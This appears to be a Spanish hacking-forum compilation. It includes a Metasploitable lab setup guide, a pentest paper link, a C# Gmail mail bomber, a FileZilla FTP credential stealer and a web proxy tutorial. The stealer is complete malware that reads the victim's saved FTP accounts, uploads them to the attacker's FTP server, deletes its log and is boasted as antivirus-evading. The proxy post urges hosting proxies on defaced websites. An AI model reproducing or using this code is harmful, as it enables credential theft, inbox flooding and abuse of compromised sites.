Temas

Uno de los problemas comunes que he visto en los foros es gente queriendo explotar X vulnerabilidad en un sistema con Metasploit Framework basandose en algun videotutorial pero siempre terminan preguntando por que no les funciona o no les crea una sesion en el sistema y eso por que obviamente no es vulnerable, bueno con Metasploitable pudes practicar con Metasploit o algun otra herramienta de explotacion.
Metasploitable es un maquina virtual (ubuntu 8.0 creo) con software y servicios viejos y vulnerables para que podamos practicar con ellos.
Vamos a instalarlo, para esto usaremos virtualbox, pero tambien pueden utilizar vmware u otro.

Instalacion:
Primero vamos a descargar y descomprimir metasploitable en la carpeta de nuestro virualbox.


DESCARGA:
TORRENT

Abrimos virtualbox y le damos click en nuevo


Le ponemos un nombre a nuestra nueva maquina virtual y como sistema operativo seleccionamos linux y como version ubuntu


Asignamos la RAM que tendra nuestra maquina, 512mb es mas que suficiente


Ahora creamos el disco virtual, en esta parte no creamos uno nuevo si no seleccionamos uno existente, este viene en la carpeta que descomprimimos (Metasploitable.vmdk), lo seleccionamos y damos siguiente


Esto es todo solo damos en crear y listo con esto ya tenemos creado nuestra maquina virtual vulnerable



Solo nos falta configurar el adaptador de red para poder interactuar con nustra maquina virtual vulnerable en la red local, para esto vamos a dar click derecho sobre la maquina virtual, click en configuracion, nos vamos a "Network", despues en el "Adaptador 1" seleccionamos "Bridged Adapter" que en español seria adaptador puente o algo asi lol


Para jugar con ella solo queda darle click en iniciar (:


Para verificar que todo funciona bien podemos hacerle un escaneo de puertos a nuestra maquina virtual con nmap


Y como pudes ver en la imagen anterior tiene muchos puertos y servicios corriendo, y todos vulnerables (:

FUENTE

[Descarga:]

Penetration Testing I - Introduccion a los Test de Penetracion

Paper introductorio a los test de penetracion, en esta serie de papers se llevara acabo un test de penetracion completo en una red empresarial real, este primer paper es solo introductorio a los conceptos basicos y metodologias actuales con las que se llevan a cabo los test de penetracion en diferentes empresas hoy en dia. Dependiendo del interes de los usuarios se publicaran las siguientes partes de esta serie de papers donde mostrare como se hace un test de penetracion de manera teorica y practica en una red empresarial real.

ÍNDICE

•PRESENTACIÓN

•INTRODUCCIÓN A LOS TEST DE PENETRACIÓN
¿QUE ES UN TEST DE PENETRACIÓN?
DEFINICIÓN
PRINCIPIOS BÁSICOS DE LA SEGURIDAD
¿QUE SE BUSCA CON LOS TEST DE PENETRACION?
METODOLOGÍAS DE LOS TEST DE PENETRACION

•TIPOS DE TEST DE PENETRACIÓN
TEST DE CAJA NEGRA
TEST DE CAJA BLANCA
TEST DE CAJA GRIS

•ETAPAS EN LOS TEST DE PENETRACIÓN
ETAPA DE RECONOCIMIENTO Y ENUMERACIÓN
ETAPA DE ANÁLISIS
ETAPA DE EXPLOTACIÓN
ETAPA DE DOCUMENTACIÓN
ETAPA DE HARDENING

•CONCLUSIÓN

•REFERENCIAS



Descarga:
http://www.mediafire.com/?b8ec9qcviscdd9w

Contraseña:
Backroot.org

[Descarga:]

Simple Mail Bomber With Gmail SMTP Client

Aqui les dejo este pequeño codigo en C# de un mailbomber usando como cliente smtp Gmail

Código [Seleccionar] Expandir


/*
  Name: CorruptedMailBomber
  Copyright: GNU General Public License
  Author: [C]orrupted[B]yte
  Date: 21/02/12
  Description: Simple MailBomber with Gmail smtp client
*/
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System.Net.Mail;

namespace MailBomber
{
    public partial class frmMain : Form
    {
        public frmMain()
        {
            InitializeComponent();
        }

        private void frmMain_Load(object sender, EventArgs e)
        {
        }

        private void btnSend_Click(object sender, EventArgs e)
        {
            int intNum = Convert.ToInt32(txtNumber.Text);
            try
            {
                MailMessage Mail = new MailMessage();
                SmtpClient smtp = new SmtpClient("smtp.gmail.com");
                Mail.From = new MailAddress(txtGmail.Text);
                Mail.To.Add(txtTo.Text);
                Mail.Subject = txtSubject.Text;
                Mail.Body = txtBody.Text;
                smtp.Port = 587;
                smtp.Credentials = new System.Net.NetworkCredential(txtGmail.Text, txtPassword.Text);
                smtp.EnableSsl = true;
                while (intNum != 0)
                {
                    smtp.Send(Mail);
                    intNum--;
                }
                MessageBox.Show("Mail Bomb, Successful");
            }

            catch (Exception ex)
            {
                MessageBox.Show(ex.ToString());
            }
        }

        private void exitToolStripMenuItem_Click(object sender, EventArgs e)
        {
            this.Close();
        }

        private void aboutToolStripMenuItem_Click(object sender, EventArgs e)
        {
            frmAbout About = new frmAbout();
            About.Show();
        }

        private void helpToolStripMenuItem_Click(object sender, EventArgs e)
        {
            frmHelp Help = new frmHelp();
            Help.Show();
        }
    }
}


Pueden descargar el proyecto en VS2010 a continuacion:

Descarga:
http://www.mediafire.com/?24es9pftpu84etm
Contraseña:
Backroot.org

[Descarga:]

Hola, aqui les dejo un code que programe hace unos dias, su funcionamiento es basico al ejecutarlo guarda todas las cuentas FTP de filezilla en un documento de texto con el nombre de la maquina victima para diferenciarlos y los manda a tu servidor FTP seguido de eso elimina el fichero y aqui no paso nada XD. Es un codigo muy pequeño y sencillo pero 100% funcional e indetectable a cualquier antivirus o por lo menos hasta donde lo testee.

El codigo esta dividido en 3 clases para que le puedan dar uso por separado como ustedes guste.


Clase principal para la llamada de los metodos de las otras clases:

Código [Seleccionar] Expandir


using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Net.NetworkInformation;
using System.IO;
using System.Xml;
using System.Threading;

namespace FileZillaStealer
{
    class Stealer
    {
        static void Main(string[] args)
        {
            string sLogs = IPGlobalProperties.GetIPGlobalProperties().HostName +"Logs.txt";
            AccountStealer StealAccounts = new AccountStealer();
            FTP SendAccounts = new FTP();
            StealAccounts.FileZillaAccounts(sLogs);
            SendAccounts.Send("ftp.server.com", "/public_html/", "user", "pass", sLogs);
            System.IO.File.Delete(sLogs);
        }
    }
}


Clase con el metodo sendo para enviar el fichero de texto con las cuentas guardadas:

Código [Seleccionar] Expandir


using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.IO;
using System.Net;

namespace FileZillaStealer
{
    class FTP
    {
        public void Send(string sHost, string sDir, string sUser, string sPass, string sFile)
        {
            string ftpHostDirFile = "ftp://" + sHost +sDir +sFile;
            FtpWebRequest ftp = (FtpWebRequest)FtpWebRequest.Create(ftpHostDirFile);
            ftp.Credentials = new NetworkCredential(sUser, sPass);
            ftp.KeepAlive = true;
            ftp.UseBinary = true;
            ftp.Method = WebRequestMethods.Ftp.UploadFile;
            FileStream fs = File.OpenRead(sFile);
            byte[] buffer = new byte[fs.Length];
            fs.Read(buffer, 0, buffer.Length);
            fs.Close();
            Stream ftpstream = ftp.GetRequestStream();
            ftpstream.Write(buffer, 0, buffer.Length);
            ftpstream.Close();
        }
    }
}


Clase para el guarado de las cuentas de filezilla en un documento de texto:

Código [Seleccionar] Expandir


using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.IO;
using System.Xml;
using System.Runtime.InteropServices;
using Microsoft.VisualBasic;

namespace FileZillaStealer
{
    class AccountStealer
    {
        public void FileZillaAccounts(string sLogsPath)
        {
            XmlDocument xmlAccountsFile = new XmlDocument();
            string sFilePath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData).ToString() + "\\FileZilla\\recentservers.xml";
            xmlAccountsFile.Load(sFilePath);
            XmlNodeList xmlRecentServers = xmlAccountsFile.GetElementsByTagName("RecentServers");
            XmlNodeList xmlList = ((XmlElement)xmlRecentServers[0]).GetElementsByTagName("Server");
            string sAccount;
            foreach (XmlElement nodo in xmlList)
            {
                XmlNodeList xmlHost = nodo.GetElementsByTagName("Host");
                XmlNodeList xmlPort = nodo.GetElementsByTagName("Port");
                XmlNodeList xmlUser = nodo.GetElementsByTagName("User");
                XmlNodeList xmlPass = nodo.GetElementsByTagName("Pass");
                sAccount = string.Format("Host: {0} Port: {1} User: {2} Pass: {3}", xmlHost[0].InnerText, xmlPort[0].InnerText, xmlUser[0].InnerText, xmlPass[0].InnerText);
                FileStream fsLogs = new FileStream(sLogsPath, FileMode.OpenOrCreate, FileAccess.Write);
                fsLogs.Close();
                StreamWriter swAccount = File.AppendText(sLogsPath);
                swAccount.WriteLine(sAccount);
                swAccount.Close();
            }
        }
}



Aqui les dejo el proyecto en VS2010:

Descarga:
http://www.mediafire.com/?2u2sns4d3rwdple
Contraseña:
Backroot.org

[Descarga:]

Pequeño Tutorial para Crear tu Propia WebProxy

Bueno aqui les dejo este pequeño manual para que puedan montar su propia web proxy tipo btunnel u otros tuneles que ay por ay =)

Descarga:
http://www.mediafire.com/?1re5x4ng4c24594

Contraseña:
MassiveDevelopment.org



Resultado:
http://www.massivedevelopment.hostzi.com/

Ingresen a cualquier pagina para que vean su ip como http://www.see-my-ip.com/ para que vean que la web proxy que e montado funciona bien  =)

Les recomendaria que en cada web defaceada ademas de subir nuestro egolatra archivo de Hacked by CorruptedByte XD tambien suban su proxy y asi tener diferentes proxys webs en los que se puedan conectar =)



Edit:
Creo que me cancelaron la cuenta gratuita de http://www.000webhost.com/ XD si lo quieren probar pueden hacerlo ay y les durara un par de dias ya que por alguna razon viola los terminos y condiciones del servicio, asi que si quieren crear su web proxy pueden rentar un servidor web dedicado o montarlo en alguna web defaceada =)